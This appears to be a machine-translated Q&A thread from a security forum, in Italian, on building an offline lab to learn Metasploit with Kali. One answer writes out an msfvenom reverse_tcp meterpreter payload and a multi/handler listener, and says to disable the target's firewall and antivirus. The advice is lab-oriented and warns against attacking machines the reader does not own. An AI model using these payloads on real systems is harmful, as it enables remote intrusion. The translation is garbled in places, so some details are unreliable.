Possiamo hackerare con il nostro computer

3

Recentemente ho acquisito interesse per Kali, in particolare framework come Metasploit. Supponiamo di avere solo un computer che non ha accesso a Internet. Voglio imparare come usare strumenti e framework in Kali come Metasploit. Ho trovato molti libri che spiegano come iniziare a Metasploit. C'è un modo in cui posso usare il mio computer sia come l'attaccante che come bersaglio mentre rimani offline?

    
posta Meysam Ghahramani 18.03.2017 - 15:04
fonte

3 risposte

5

Sì, ma invece di utilizzare un software di virtualizzazione come VirtualBox o VMware per installare la macchina vittima o la macchina attaccante (non si desidera che una macchina vulnerabile sia connessa direttamente a Internet).
Leggi libri come Metasploit: The Penetration Tester's Guide , è un grande libro scritto dallo sviluppatore di Metasploit. Tuttavia, molte funzionalità di Metasploit sono cambiate rispetto al rilascio del libro e non esiste una versione aggiornata di esso.
Pertanto, consiglierei di leggere Test di penetrazione - Un'introduzione pratica all'hacking . È relativamente nuovo e un buon libro.

Impostazione Lab

Come leggerete i libri, vi guideranno come configurare il vostro laboratorio di test. Con ogni passo in dettaglio.

Il problema

I libri massimi iniziano con Windows XP, ma sfortunatamente Microsoft ha terminato il proprio supporto per Windows XP. Quindi, avrai difficoltà a trovare l'installazione di XP. Anche se riesci a trovare Windows XP, la vulnerabilità elencata nei libri verrà corretta (a meno che tu non stia usando un laboratorio di Penna-Test online, ci arriverò più tardi). Quindi dirai "A che serve leggere questo libro? ", ti insegnerà le basi delle seguenti cose," Come sfruttare le vulnerabilità note "e molti altri modi su" Come puoi compromettere un sistema ".

Nei prossimi capitoli scoprirai che sfrutteranno alcune vulnerabilità conosciute e avranno accesso al sistema e cercheranno di insegnarti qualcosa di Post-Sfruttamento (cioè cosa fare quando hai compromesso un sistema). C'è un intero capitolo su "Post-Exploitation", ma dovrai usare qualche trucchetto di Post-Exploitation di tanto in tanto.
Troverai frustrante non poter fare nulla riguardo a una vulnerabilità patchata. Qui di seguito descriverò un piccolo trucco per compromettere un computer, in modo che tu possa goderti un po 'di Post-Sfruttamento fino al prossimo capitolo.

Soluzione:

Supponendo che tu sia riuscito a trovare Windows XP e che le cose siano corrette e tu voglia goderti un po 'di Post-Sfruttamento.

Segui i seguenti passaggi:

Open a terminal

     msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ip of your machine) LPORT=(port you want to connect back to) -f exe > filename.exe

Trasferisci questo file sul computer della vittima e disabilita Windows Firewall e AV in quanto verrà rilevato da qualsiasi AV (non è un buon metodo per compromettere un sistema, ma per imparare un post Sfruttamento puoi usarlo). Non aprire il file attendere fino a quando non hai terminato tutti i passaggi.

  Di nuovo apri un terminale e digita

   msfconsole

    use multi/handler

   set payload windows/meterpreter/reverse_tcp

   set LHOST XXX.XXX.XX.X

    set LPORT XXX

   run (non chiudere questo terminale, qui otterrai la sessione meterpreter dopo aver eseguito il file sul computer vittima)

  Quando hai finito con tutti i passaggi precedenti puoi andare al computer vittima ed eseguire il file exe generato.

Hoollaa! otterrai una sessione di meterpreter e ora potrai goderti un po 'di Post-Sfruttamento

Nota


1- Leggi attentamente come impostare il tuo laboratorio dal libro con attenzione altrimenti il file exe generato sopra non funzionerà.
2- Puoi ottenere il tuo indirizzo IP digitando ifconfig (tutte queste cose sono menzionate nella sezione di configurazione del laboratorio, quindi percorrila).
3- Accertati di aver inserito lo stesso valore LHOST e LPORT nel luogo specificato.

Puoi anche imparare da SecurityTube su Metasploit nella sezione Megaprimer. I video sono gratuiti da guardare ma possono iscriversi a loro e puoi accedere al loro laboratorio online. Quindi non dovrai superare tutti i problemi descritti sopra. È una tua scelta.

Spero che questo possa aiutarti.

Aggiorna

Il file sopra generato funzionerà solo per Windows. Ma puoi anche usare la distro Linux vulnerabile come metasploitable. Si tratta di una distribuzione Linux vulnerabile appositamente progettata e troverai numerosi tutorial e libri su come sfruttare metasploitable.

    
risposta data 19.03.2017 - 04:08
fonte
1

Invece di creare il tuo laboratorio da solo. Ci sono strumenti che puoi usare per configurare facilmente.

Si tratta di applicazioni vulnerabili per testare le tue abilità e lavorarci sopra usando Kali o metasploit.

  1. Metasploitable2
  2. Metasploitable3
  3. DVWA

C'è una lunga lista di app da provare

Controlla l'elenco delle owasp qui

A seconda di cosa vuoi imparare. Metasploit sono principalmente per attacchi basati su rete. Tuttavia ci sono alcuni attacchi basati sul Web incorporati.

Puoi provare quanto sopra con metasploit.

Le macchine virtuali metasploitable sono pensate per metasploit.

Se sei pronto per una sfida. È possibile scaricare qualsiasi macchina Windows, senza patch e testare su di essi.

Tuttavia devo ripetere. NON TESTARE SU MACCHINE IN DIRETTA O UNO CHE NON SIA PROPRIO DA SE STESSA.

    
risposta data 19.03.2017 - 05:35
fonte
-1

Prima di tutto:

USATE SOLO VM VM SOLO PER "HACKING" CON KALI !!!

Se le tue macchine sono online, giocherai un gioco pericoloso che il mio professore chiamava "Potresti essere un criminale se ..." Un piccolo errore, come digitare erroneamente un indirizzo IP o usare o attaccare un tuo computer non possedere, potrebbe portare a conseguenze disastrose. Questo può essere punito con il CFAA per multe e penali maggiori.

Macchine virtuali: Con la dichiarazione di non responsabilità, raccomando vivamente di eseguire sia Kali Linux, sia qualsiasi target o altre macchine di prova in Virtual Box di Oracle . Virtal Box è un software gratuito, è anche possibile utilizzare VMWare o qualsiasi altro software di virtualizzazione che consente opzioni di networking. Una volta installato e aggiornato un sistema operativo su Virtual Box, puoi fare clic sulla VM nella finestra principale, quindi accedere a Impostazioni - > Rete. Assicurarsi che questo reciti "INTERNET NETWORK". Ciò garantirà che il traffico NON possa lasciare la macchina con Virtual Box.

Il sistema operativo: Consiglierei Windows XP SP0 per il computer di destinazione iniziale in quanto è particolarmente vulnerabile. Il supporto è terminato per questo software, ma se riesci a procurarti una copia, il tuo sfruttamento anticipato sarà facile. Esiste anche una versione vulnerabile di Linux chiamata Metasploitable Linux che è anche una buona macchina di prova per i vettori di attacco di Linux.

Apprendimento ulteriore: Se si dispone dell'opportunità, configurare un piccolo netowrk di macchine, possibile con funzionalità più avanzate come Active Directory (o LDAP), server DNS e / o server Web per creare confusione con Cross Site Scripting (XSS) utilizzando manzo .

Ricorda sempre di testare e assicurati di non avere la connettività Internet prima di pentestare le tue macchine. Buon divertimento e buona fortuna!

    
risposta data 28.03.2017 - 23:43
fonte

Leggi altre domande sui tag